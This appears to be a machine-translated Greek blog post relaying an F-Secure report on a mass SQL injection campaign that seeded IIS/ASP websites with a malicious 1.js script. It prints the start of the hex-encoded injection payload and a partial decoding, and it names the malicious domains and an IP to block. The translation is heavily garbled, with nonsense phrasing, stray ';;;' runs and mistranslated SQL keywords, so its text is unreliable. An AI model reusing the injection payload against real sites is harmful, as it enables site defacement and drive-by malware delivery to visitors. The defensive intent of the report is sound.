Η καλύτερη πηγή σας πληροφοριών και ειδήσεων περίπου vista παραθύρων, υλικό και υλικό στο διαδίκτυο

Vista ΑΡΘΡΑ ΚΟΡΥΦΗ 50 Ιός Spyware Vista SOFT Vista ΒΟΗΘΕΙΑ

Μαζικές SQL εγχύσεις


Νωρίτερα αυτή η εβδομάδα δημόσιευσα το α θέση σχετικά με μια ευπάθεια σε διάφορες εκδόσεις των παραθύρων της Microsoft
… Καλά η ευπάθεια είναι τώρα είναι εκτελώ-εκεί ένας άλλος κύκλος των μαζικών SQL εγχύσεων που πηγαίνουν σε όποιος έχει μολύνει τις εκατοντάδες χιλιάδες των ιστοχώρων που τρέχουν στην πλατφόρμα IIS.

Ο προσχηματισμός μιας απλής αναζήτησης Google των ιχνών του κακόβουλου χειρογράφου οδηγεί 510.000 τροποποιημένες σελίδες.

Με όλο και περισσότερο τους ιστοχώρους που χρησιμοποιούν ένα οπίσθιο μέρος SQL για να τους καταστήσει γρηγορότερους και δυναμικότερους, επίσης σημαίνει ότι είναι κρίσιμο να ελεγχθεί ποιες πληροφορίες παίρνουν αποθηκευμένες μέσα ή ζητούμενες από εκείνες τις βάσεις δεδομένων - ειδικά εάν επιτρέπετε στους χρήστες για να φορτώσετε το περιεχόμενο οι ίδιοι που συμβαίνει όλη την ώρα στα φόρουμ συζήτησης, blogs, ανατροφοδοτήστε τα έντυπα κ.λπ. Εκτός αν εκείνο το στοιχείο αποστειρώνεται προτού να πάρει σωζόμενο δεν μπορείτε να ελέγξετε τι ο ιστοχώρος θα παρουσιάσει στους χρήστες. Αυτό είναι ποια έγχυση SQL είναι όλη περίπου, που εκμεταλλεύεται τις αδυναμίες σε αυτούς τους ελέγχους.

Αυτήν την περίοδο το κακόβουλο αρχείο που εγχέεται είναι 1.js εντούτοις πρέπει να διαπιστωθεί ότι αυτό θα μπορούσε να αλλάξει σε οποιοδήποτε στάδιο. Οι επισκέπτες σε αυτόν τον ιστοχώρο είναι;;; αντιμετωπισμένος;;; σε 8 διαφορετικά εκμεταλλεύεται για πολλές βασισμένες στα παράθυρα εφαρμογές συμπεριλαμβανομένου του AIM, RealPlayer, και iTunes. ΟΧΙπεριοχές επίσκεψης που συνδέουν με αυτήν την περιοχή δεδομένου ότι είναι πολύ πιθανό να πάρετε μολυσμένοι. Το Trendmicro που ονομάζεται το malware toj_agent.KAQ αυτό προσέχει για τους κωδικούς πρόσβασης και τους περνά πίσω στο contoller;;; s IP.

Σε αυτήν την περίπτωση ο κώδικας εγχύσεων αρχίζει όπως αυτό (η σημείωση, αυτό δεν είναι ο πλήρης κώδικας):

;;;;;; DECLARE%20@S%20NVARCHAR (4000) SET%20@S=CAST (0x440045004300
;;;;;; 4C00410052004500200040005400200076006100720063006800610072
;;;;;; 00280032003500350029002C0040004300200076006100720063006800
;;;;;; 610072002800320035003500290020004400450043004C004100520045
;;;;;; 0020005400610062006C0065005F0043007500720073006F0072002000
;;;;;; 43005500520053004F005200200046004F0052002000730065006C0065
;;;;;; 0063007400200061002E006E0061006D0065002C0062002E006E006100
;;;;;; 6D0065002000660072006F006D0020007300790073006F0062006A0065
;;;;;; 00630074007300200061002C0073007900730063006F006C0075006D00
;;;;;; 6E00730020006200200077006800650072006500200061002E00690064
;;;;;; 003D0062002E0069006400200061006E006400200061002E0078007400
;;;;;; 7900700065003D00270075002700200061006E0064002000280062002E
;;;;;; 00780074007900700065003D003900390020006F007200200062002E00
;;;;;; 780074007900700065003D003300350020006;;;

Όποιος όταν αποκωδικοποιείται γίνεται:

;;;;;; ΔΗΛΩΣΤΕ @T που varchar (255) «@C varchar (255) ΔΗΛΏΝΕΙ Table_Cursor
;;;;;; ΔΡΟΜΕΑΣ ΓΙΑ επίλεκτο a.name'b.name από τα sysobjects a'syscolumns β
;;;;;; πού a.id=b.id και a.xtype='u και (b.xtype=99 ή b.xtype=35
;;;;;; ή β;;;

Αυτό που συμβαίνει κατά συνέπεια; Βρίσκει όλους τους τομείς κειμένων στη βάση δεδομένων και προσθέτει μια σύνδεση με το κακόβουλο javascript σε καθένας τους όποιος θα κάνει τον ιστοχώρο σας να τους επιδείξει αυτόματα. Τόσο ουσιαστικά τι συνέβη ήταν ότι οι επιτιθέμενοι έψαξαν ASP ή τις σελίδες ASPX που περιέχει οποιοδήποτε τύπο (μια δυναμική αξία όπως μια ταυτότητα άρθρου, η ταυτότητα προϊόντων, το κ.λπ.) η παράμετρος και προσπάθησαν να χρησιμοποιήσουν αυτής για να φορτώσουν τον κώδικα εγχύσεων SQL τους.

Μέχρι τώρα τρεις διαφορετικές περιοχές έχουν χρησιμοποιηθεί για να φιλοξενήσουν το κακόβουλο περιεχόμενο;;; nmidahena.com, aspder.com και nihaorr1.com. Υπάρχει ένα σύνολο αρχείων που παίρνει φορτωμένο από αυτές τις περιοχές που προσπαθεί να χρησιμοποιήσει διαφορετικό εκμεταλλεύεται για να εγκαταστήσει ένα σε απευθείας σύνδεση τυχερό παιχνίδι τρωικό. Αμέσως η αρχική σελίδα άθλου σε όλες τις περιοχές είναι απρόσιτη αλλά αυτή θα μπορούσε να αλλάξει. So if you’re a firewall administrator we recommend you to block access to them.

I would recommend that Administrators block??access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from f-secure

Popularity: 2%


Written by Patrick S. Read more great feeds at is source WEBSITE
no comments.
Read more articles on otherSoftware and MS News.

Related articles

No comments

There are still no comments on this article.

Leave your comment...

If you want to leave your comment on this article, simply fill out the next form:




You can use these XHTML tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> .